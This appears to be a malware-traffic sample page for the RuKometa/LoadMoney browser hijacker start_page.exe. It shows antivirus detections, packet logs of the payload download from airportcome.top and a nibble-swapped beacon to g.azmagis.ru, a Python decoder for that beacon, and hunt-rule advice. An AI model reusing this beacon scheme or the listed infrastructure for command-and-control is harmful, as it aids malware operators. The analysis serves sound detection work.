RuKometa/LoadMoney/Mupad Browser Hijacker Trojan Malware PCAP File download traffic sample start_page.exe

Download Attachments

  • start_page (pcap, 30 KB), added January 16, 2017 5:36 am by admin
SHA256: 2030f0f9fa95e6e824d12664b48344c6e4fd58e607c96e6300c88a8292d1f743
File name: start_page.exe
Detection ratio: 44 / 56

Antivirus         Result                                               Update
ALYac             Trojan.GenericKD.3282138                             2017-01-16
AVG               Generic38.TUP                                        2017-01-16
AVware            Trojan.Win32.Generic!BT                              2017-01-16
Ad-Aware          Trojan.GenericKD.3282138                             2017-01-16
AegisLab          Adware.W32.Extbro!c                                  2017-01-14
AhnLab-V3         Trojan/Win32.Mupad.C1469490                          2017-01-15
Arcabit           Trojan.Generic.D3214DA                               2017-01-16
Avast             Win32:Adware-gen [Adw]                               2017-01-16
Avira (no cloud)  PUA/LoadMoney.fgl                                    2017-01-15
BitDefender       Trojan.GenericKD.3282138                             2017-01-16
CAT-QuickHeal     Trojan.Mupad                                         2017-01-14
ClamAV            Win.Adware.Extbro-1                                  2017-01-16
Comodo            ApplicUnwnt.Win32.RuKometa.A                         2017-01-16
Cyren             W32/S-6a0e4df5!Eldorado                              2017-01-16
DrWeb             Trojan.LoadMoney.1452                                2017-01-16
ESET-NOD32        a variant of Win32/RuKometa.E potentially unwanted   2017-01-15
2017-01-16 00:10:18.346622 IP 192.168.1.102.63320 > 193.238.152.147.80: Flags [P.], seq 0:308, ack 1, win 256, length 308: HTTP: GET /start_page.exe HTTP/1.1
GET /start_page.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: hldklshzunakfbm.airportcome.top
Connection: Keep-Alive

2017-01-16 00:11:03.997483 IP 192.168.1.102.64417 > 75.75.75.75.53: 63876+ A? g.azmagis.ru. (30)
2017-01-16 00:11:04.168379 IP 192.168.1.102.63322 > 185.20.186.52.80: Flags [S], seq 1745079406, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-01-16 00:11:04.273747 IP 192.168.1.102.63322 > 185.20.186.52.80: Flags [.], ack 3445242612, win 256, length 0
2017-01-16 00:11:04.274405 IP 192.168.1.102.63322 > 185.20.186.52.80: Flags [P.], seq 0:500, ack 1, win 256, length 500: HTTP: GET /%f3%07%27%f6%46%d3%37%47%16%27%47%f5%07%16%76%56%62%67%56%27%37%96%f6%e6%d3%33%e2%33%53%62%76%57%96%46%d3%23%93%13%56%83%56%26%33%33%83%03%33%43%03%23%03%26%43%83%73%63%46%03%13%36%46%63%16%73%63%73%13%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
GET /%f3%07%27%f6%46%d3%37%47%16%27%47%f5%07%16%76%56%62%67%56%27%37%96%f6%e6%d3%33%e2%33%53%62%76%57%96%46%d3%23%93%13%56%83%56%26%33%33%83%03%33%43%03%23%03%26%43%83%73%63%46%03%13%36%46%63%16%73%63%73%13%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
User-Agent: start_page 3.35
Host: g.azmagis.ru
Cache-Control: no-cache
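The capture shows two things worth pulling apart: start_page.exe is fetched over plain HTTP from hldklshzunakfbm.airportcome.top (193.238.152.147) with an Internet Explorer 8 / Windows NT 5.1 User-Agent, and about 45 seconds later the host resolves g.azmagis.ru and sends a GET to 185.20.186.52 with the non-browser User-Agent "start_page 3.35". The path of that second request is not random. Every byte is percent-encoded, and swapping the two hex digits of each byte (0xf3 becomes 0x3f "?", 0x07 becomes 0x70 "p", 0x27 becomes 0x72 "r") turns it into a readable query string. The script below is an added example, not part of the original capture page or of any tool it cites: it decodes the path exactly as it appears above, parses the parameters, rebuilds the encoded form to confirm the round trip, and applies the same checks to the first request for contrast. The nibble-swap reading is an inference from the bytes on this page, and the parameter names are simply whatever the decoded string contains; the triage heuristics are this example's own.

```python
import re
from urllib.parse import parse_qsl, unquote_to_bytes

# Request path exactly as it appears in the capture above (the GET to
# g.azmagis.ru), split across lines only for readability.
CAPTURED_PATH = (
    "/%f3%07%27%f6%46%d3%37%47%16%27%47%f5%07%16%76%56%62%67%56%27%37%96%f6"
    "%e6%d3%33%e2%33%53%62%76%57%96%46%d3%23%93%13%56%83%56%26%33%33%83%03"
    "%33%43%03%23%03%26%43%83%73%63%46%03%13%36%46%63%16%73%63%73%13%62%d6"
    "%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66"
    "%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47"
    "%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6"
)

# Constructed contrast case: the first request and its User-Agent from the capture.
DOWNLOAD_PATH = "/start_page.exe"
DOWNLOAD_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
BEACON_UA = "start_page 3.35"

_FULLY_ENCODED = re.compile(r"/(%[0-9a-fA-F]{2})+")


def swap_nibbles(data: bytes) -> bytes:
    """Swap the high and low 4-bit halves of every byte (0xf3 -> 0x3f)."""
    return bytes(((b & 0x0F) << 4) | (b >> 4) for b in data)


def decode_path(path: str) -> str:
    """Percent-decode the path to raw bytes, un-swap the nibbles and return
    the plaintext query string (leading '?' included)."""
    raw = unquote_to_bytes(path.lstrip("/"))
    return swap_nibbles(raw).decode("ascii")


def parse_beacon(path: str) -> dict:
    """Decode the path and split the query string into a name -> value dict."""
    decoded = decode_path(path)
    return dict(parse_qsl(decoded.lstrip("?"), keep_blank_values=True))


def encode_path(query: str) -> str:
    """Inverse of decode_path: swap nibbles, then percent-encode every byte in
    lowercase hex, which is the form seen in the captured request."""
    return "/" + "".join(f"%{b:02x}" for b in swap_nibbles(query.encode("ascii")))


def is_fully_percent_encoded(path: str) -> bool:
    """True when the whole path after '/' is nothing but %XX sequences."""
    return _FULLY_ENCODED.fullmatch(path) is not None


def triage_request(path: str, user_agent: str) -> list:
    """Heuristic checks (this example's own) for a request line + User-Agent.
    Returns a list of human-readable findings; empty means nothing flagged."""
    findings = []
    if is_fully_percent_encoded(path):
        findings.append("every byte of the path is percent-encoded")
        try:
            params = parse_beacon(path)
        except UnicodeDecodeError:
            params = {}  # nibble-swapped bytes were not printable ASCII
        if params:
            findings.append("nibble-swapped query decodes to: "
                            + ", ".join(f"{k}={v}" for k, v in params.items()))
            prod, ver = params.get("prod"), params.get("version")
            if prod and ver and user_agent == f"{prod} {ver}":
                findings.append("User-Agent matches decoded prod/version fields")
    if not user_agent.startswith("Mozilla/"):
        findings.append(f"non-browser User-Agent: {user_agent!r}")
    return findings


if __name__ == "__main__":
    print("decoded :", decode_path(CAPTURED_PATH))
    for k, v in parse_beacon(CAPTURED_PATH).items():
        print(f"  {k:8} = {v}")
    print("roundtrip ok:", encode_path(decode_path(CAPTURED_PATH)) == CAPTURED_PATH)
    for path, ua in ((DOWNLOAD_PATH, DOWNLOAD_UA), (CAPTURED_PATH, BEACON_UA)):
        print(path[:40], "->", triage_request(path, ua) or "nothing flagged")
```

Two of the decoded fields line up with headers already visible in the capture: version=3.35 matches the "start_page 3.35" User-Agent, and os=5.1 matches the "Windows NT 5.1" in the download request, which is a useful sanity check that the decoding is right rather than a coincidence of printable bytes. The guid and mid values are 32 hex characters each, so a hunt rule keyed on the hldklshzunakfbm.airportcome.top and g.azmagis.ru hostnames, the "start_page" User-Agent, or a fully percent-encoded path with a non-browser User-Agent will catch this beacon without depending on those per-host identifiers.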
